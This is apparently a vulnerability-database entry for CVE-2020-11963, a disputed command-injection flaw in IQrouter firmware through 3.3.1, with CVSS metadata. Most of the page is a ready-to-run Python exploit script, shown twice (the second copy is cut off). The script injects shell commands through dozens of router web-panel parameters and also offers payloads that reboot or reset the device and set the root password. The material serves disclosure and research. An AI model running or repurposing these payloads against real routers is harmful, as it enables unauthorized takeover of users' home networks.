Description
** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”.
Affected Software
Related
{"id": "CVE-2020-11963", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-11963", "description": "** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is \u201ctrue for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time\u201d.", "published": "2020-04-21T13:15:00", "modified": "2020-11-30T19:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11963", "reporter": "cve@mitre.org", "references": ["https://evenroute.com/", "https://pastebin.com/grSCSBSu", "https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "https://openwrt.org/docs/guide-quick-start/walkthrough_login"], "cvelist": ["CVE-2020-11963"], "immutableFields": [], "lastseen": "2022-03-23T12:25:41", "viewCount": 75, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:48358"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157300"]}, {"type": "zdt", "idList": ["1337DAY-ID-34278"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:5468BBEF-DC01-4DCA-9191-83F7000E6F39", "AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}], "wildExploited": true}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA"]}, {"type": "exploitdb", "idList": ["EDB-ID:48358"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157300"]}, {"type": "zdt", "idList": ["1337DAY-ID-34278"]}]}, "affected_software": {"major_version": [{"name": "evenroute iqrouter firmware", "version": 3}]}, "vulnersScore": 2.1}, "_state": {"wildexploited": 0, "dependencies": 1659876597, "score": 1659818015, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "51b9e5b0bf35b0a09da9ebb02c175afc"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:evenroute:iqrouter_firmware:3.3.1"], "cpe23": ["cpe:2.3:o:evenroute:iqrouter_firmware:3.3.1:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "evenroute:iqrouter_firmware", "version": "3.3.1", "operator": "le", "name": "evenroute iqrouter firmware"}], "affectedConfiguration": [{"name": "evenroute iqrouter", "cpeName": "evenroute:iqrouter", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:evenroute:iqrouter_firmware:3.3.1:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.1", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:evenroute:iqrouter:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://evenroute.com/", "name": "https://evenroute.com/", "refsource": "MISC", "tags": ["Product"]}, {"url": "https://pastebin.com/grSCSBSu", "name": "https://pastebin.com/grSCSBSu", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "name": "https://evenroute.zendesk.com/hc/en-us/articles/216107838-How-do-I-configure-an-IQrouter-", "refsource": "MISC", "tags": []}, {"url": "https://openwrt.org/docs/guide-quick-start/walkthrough_login", "name": "https://openwrt.org/docs/guide-quick-start/walkthrough_login", "refsource": "MISC", "tags": []}]}
{"attackerkb": [{"lastseen": "2023-01-05T11:11:46", "description": "** DISPUTED ** IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is \u201ctrue for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time\u201d.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-11963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11963"], "modified": "2020-11-30T00:00:00", "id": "AKB:C79B9195-A753-43F8-8C97-03A392AFA6EA", "href": "https://attackerkb.com/topics/gYul2kDmyf/cve-2020-11963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-20T03:53:26", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "zdt", "title": "IQrouter 3.3.1 Firmware - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11968", "CVE-2020-11966", "CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11967"], "modified": "2020-04-21T00:00:00", "id": "1337DAY-ID-34278", "href": "https://0day.today/exploit/description/34278", "sourceData": "# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution\r\n# Exploit Author: drakylar\r\n# Vendor Homepage: https://evenroute.com/\r\n# Software Link: https://evenroute.com/iqrouter\r\n# Version: IQrouter firmware up to 3.3.1\r\n# Tested on: IQrouter firmware 3.3.1\r\n# CVE : N/A \r\n\r\n#!/usr/bin/env python3\r\nimport argparse\r\nfrom sys import argv, exit\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"Install requests lib! pip3 install requests\")\r\n\r\n\r\nprint(\"\"\"\r\n#######################################################################\r\n# IQrouter multiple RCE and other vulnerabilities #\r\n# by drakylar (Shaposhnikov Ilya) #\r\n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #\r\n# CVE-2020-11967 CVE-2020-11968 #\r\n#######################################################################\r\n\"\"\")\r\n\r\n\r\nrce_setup = [\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\",\r\n \"RCE /vlanTag (vlan_tag param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\",\r\n \"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\",\r\n \"RCE /screen9 (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\",\r\n \"RCE /screen9 (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\",\r\n \"RCE /screen9 (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\",\r\n \"RCE /screen9 (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen4?save_isp='`{}`\",\r\n \"RCE /screen4 (save_isp param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\",\r\n \"RCE /screen2 set_wan_modem_interfaces param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\",\r\n \"RCE /screen2 find_ip_address_conflict param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\",\r\n \"RCE /screen10 (set_security_question param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\",\r\n \"RCE /screen10 (set_security_answer param)\"],\r\n [\r\n \"/cgi-bin/luci/er/screen1?zonename='`{}`'\",\r\n \"RCE /screen1 (zonename param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/register?email=`{}`\",\r\n \"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\"\r\n ]\r\n]\r\n\r\nrce_any = [\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\",\r\n \"RCE /wifi (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\",\r\n \"RCE /wifi (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\",\r\n \"RCE /wifi (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_5g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_2g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guest_key param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\",\r\n \"RCE /wifi (enable_guestwifi param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123\",\r\n \"RCE /screen11.1 (email param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?link='`{}`'\",\r\n \"RCE /reboot_link (link param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\",\r\n \"RCE /diag_wifi (htm5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\",\r\n \"RCE /diag_wifi (htm2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\",\r\n \"RCE /diag_wifi (c5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\",\r\n \"RCE /diag_wifi (c2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\",\r\n \"RCE /diag_set_static_wan (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\",\r\n \"RCE /diag_set_static_wan (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\",\r\n \"RCE /diag_set_static_wan (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\",\r\n \"RCE /diag_set_static_wan (dns param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\",\r\n \"RCE /diag_set_static_modem (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\",\r\n \"RCE /diag_set_static_modem (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\",\r\n \"RCE /diag_set_static_modem (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\",\r\n \"RCE /diag_set_device_name_and_sync (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\",\r\n \"RCE /diag_set_device_name (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\",\r\n \"RCE /diag_pppoe_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\",\r\n \"RCE /diag_pppoe (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\",\r\n \"RCE /diag_pppoa_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\",\r\n \"RCE /diag_pppoa (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/advanced_link?link='`{}`'\",\r\n \"RCE /advanced_link (link param)\"\r\n ]\r\n\r\n]\r\n\r\nadvanced_payloads = [\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?reboot=1\",\r\n \"Reboot IQrouter (/reboot_link reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?reboot=1\",\r\n \"Reboot IQrouter (/screen2 reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/index?reset_config=1\",\r\n \"Reset IQrouter (/index reset_config param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen7?upgrade=1\",\r\n \"Upgrade IQrouter (/screen7 upgrade param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?restart_network=1\",\r\n \"Restart network (/vlanTag restart_network param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/start\",\r\n \"Start iperf script (/diag_iperf_cmd/start)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/stop\",\r\n \"Stop iperf script (/diag_iperf_cmd/stop)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/get_syslog\",\r\n \"Router setup info log (/get_syslog)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\",\r\n \"Change root password to c00lpasswd (can change in code)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reset_password/\",\r\n \"Change root password to 'changeme' (static)\"\r\n ]\r\n]\r\n\r\n\r\ndef print_payloads():\r\n print('#' * 30)\r\n print(\"Payloads list\")\r\n num = 1\r\n print('######################### RCE without auth ########################')\r\n for payload in rce_any:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '############### RCE (router need to be in setup mode) ###############')\r\n for payload in rce_setup:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '######################### Advanced payloads #########################')\r\n for payload in advanced_payloads:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\")\r\nparser.add_argument('--host', help='Host', type=str)\r\nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)\r\nparser.add_argument('-n', '--num', help='Payload number',\r\n default=0, type=int)\r\nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',\r\n default=\"pwd\", type=str)\r\nparser.add_argument('--protocol', help='Protocol (http/https)',\r\n default=\"http\", type=str)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n print(\"\")\r\n full_payload_list = rce_setup + rce_any + advanced_payloads\r\n payloads_amount = len(full_payload_list)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n payload_num = int(args.num)\r\n bash_cmd = args.cmd\r\n protocol = args.protocol\r\n\r\n if payload_num < 1 or payload_num > payloads_amount:\r\n print(\"Error with payload number!\")\r\n raise IndexError\r\n if port < 0 or port > 65535:\r\n print(\"Error with port number\")\r\n raise IndexError\r\n if protocol not in ['http', 'https']:\r\n print(\"Error with protocol name\")\r\n raise IndexError\r\n\r\n current_payload = full_payload_list[payload_num - 1]\r\n print(\"Payload: {}\".format(current_payload[1]))\r\n print(\"Host: {}\".format(hostname))\r\n print(\"Port: {}\".format(port))\r\n print(\"Protocol: {}\".format(protocol))\r\n print(\"Command: {}\".format(bash_cmd))\r\n\r\n full_url = \"{}://{}:{}{}\".format(protocol, hostname, port,\r\n current_payload[0].format(bash_cmd))\r\n print(\"Built URL: {}\".format(full_url))\r\n\r\n r = requests.get(full_url)\r\n print(\"Status code: {}\".format(r.status_code))\r\n return\r\n except IndexError:\r\n parser.print_help()\r\n print_payloads()\r\n exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\r\n \"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\")\r\n exit(main())\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34278", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T04:10:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-21T00:00:00", "type": "exploitdb", "title": "IQrouter 3.3.1 Firmware - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11966", "CVE-2020-11967", "CVE-2020-11968"], "modified": "2020-04-21T00:00:00", "id": "EDB-ID:48358", "href": "https://www.exploit-db.com/exploits/48358", "sourceData": "# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution\r\n# Date: 2020-04-21\r\n# Exploit Author: drakylar\r\n# Vendor Homepage: https://evenroute.com/\r\n# Software Link: https://evenroute.com/iqrouter\r\n# Version: IQrouter firmware up to 3.3.1\r\n# Tested on: IQrouter firmware 3.3.1\r\n# CVE : N/A \r\n\r\n#!/usr/bin/env python3\r\nimport argparse\r\nfrom sys import argv, exit\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"Install requests lib! pip3 install requests\")\r\n\r\n\r\nprint(\"\"\"\r\n#######################################################################\r\n# IQrouter multiple RCE and other vulnerabilities #\r\n# by drakylar (Shaposhnikov Ilya) #\r\n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #\r\n# CVE-2020-11967 CVE-2020-11968 #\r\n#######################################################################\r\n\"\"\")\r\n\r\n\r\nrce_setup = [\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\",\r\n \"RCE /vlanTag (vlan_tag param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\",\r\n \"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\",\r\n \"RCE /screen9 (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\",\r\n \"RCE /screen9 (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\",\r\n \"RCE /screen9 (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\",\r\n \"RCE /screen9 (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen4?save_isp='`{}`\",\r\n \"RCE /screen4 (save_isp param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\",\r\n \"RCE /screen2 set_wan_modem_interfaces param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\",\r\n \"RCE /screen2 find_ip_address_conflict param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\",\r\n \"RCE /screen10 (set_security_question param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\",\r\n \"RCE /screen10 (set_security_answer param)\"],\r\n [\r\n \"/cgi-bin/luci/er/screen1?zonename='`{}`'\",\r\n \"RCE /screen1 (zonename param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/register?email=`{}`\",\r\n \"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\"\r\n ]\r\n]\r\n\r\nrce_any = [\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\",\r\n \"RCE /wifi (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\",\r\n \"RCE /wifi (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\",\r\n \"RCE /wifi (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_5g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_2g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guest_key param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\",\r\n \"RCE /wifi (enable_guestwifi param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123\",\r\n \"RCE /screen11.1 (email param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?link='`{}`'\",\r\n \"RCE /reboot_link (link param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\",\r\n \"RCE /diag_wifi (htm5ghz param)\"\r\n ],\r\n [\r\n 